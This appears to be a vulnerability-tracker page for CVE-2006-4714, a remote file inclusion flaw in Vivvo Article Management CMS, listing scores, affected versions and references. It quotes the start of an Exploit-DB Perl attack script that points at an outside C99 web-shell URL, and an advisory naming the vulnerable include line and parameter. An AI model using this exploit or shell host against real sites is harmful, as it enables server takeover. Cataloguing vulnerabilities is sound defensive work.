CVE-2006-4714
published 2006-09-12CVE-2006-4714: PHP remote file inclusion vulnerability in index.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.2 and earlier, when register_globals is…
PriorityP333medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
3.39%
87.3th percentile
PHP remote file inclusion vulnerability in index.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the classified_path parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| spoonlabs | vivvo_article_management_cms | <= 3.25 | — |
| spoonlabs | vivvo_article_management_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Vivvo CMS 3.4 - Multiple Vulnerabilities
exploitdb·2008-10-19
CVE-2007-3939 Vivvo CMS 3.4 - Multiple Vulnerabilities
Vivvo CMS 3.4 - Multiple Vulnerabilities
---
#!/usr/bin/perl
#Vivvo CMS Destroyer
#[email protected]
#By Xianur0
#-------------CREDITS-------------
#http://milw0rm.com/exploits/4192
#http://milw0rm.com/exploits/3326
#http://milw0rm.com/exploits/2339
#http://milw0rm.com/exploits/2337
#-------------/CREDITS-------------
print "\n Vivvo CMS Destroyer By Xianur0\n";
#-----------CONFIG----------
$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
$textshell = 'C99Shell v.';
#----------/CONFIG----------
use LWP::UserAgent;
use Switch;
my $path = $ARGV[0];
$path = shift || &uso;
sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;}
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$req = HTTP::Request->
Exploit-DB
Vivvo Article Manager 3.2 - 'classified_path' File Inclusion
exploitdb·2006-09-09
CVE-2006-4714 Vivvo Article Manager 3.2 - 'classified_path' File Inclusion
Vivvo Article Manager 3.2 - 'classified_path' File Inclusion
---
#########################################################################
#MercilessTurk [email protected]
#########################################################################
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
#########################################################################
#Vulnerable Code in HTML_function.php function HTML_Category_Menu() :
#line 51: include_once($classified_path.'export_category.php');
#if register_globals = On then this code can include $_GET['classified_path']
#in index.php HTML_Category_Menu() function is called:
#line 45:
#$box_sections_HTML=HTML_Category_Menu();
################################################################
No writeups or analysis indexed.
http://secunia.com/advisories/21855http://securitydot.net/xpl/exploits/vulnerabilities/articles/1467/exploit.htmlhttp://www.securityfocus.com/bid/84147http://www.vupen.com/english/advisories/2006/3548https://exchange.xforce.ibmcloud.com/vulnerabilities/28834https://www.exploit-db.com/exploits/2339http://secunia.com/advisories/21855http://securitydot.net/xpl/exploits/vulnerabilities/articles/1467/exploit.htmlhttp://www.securityfocus.com/bid/84147http://www.vupen.com/english/advisories/2006/3548https://exchange.xforce.ibmcloud.com/vulnerabilities/28834https://www.exploit-db.com/exploits/2339
2006-09-12
Published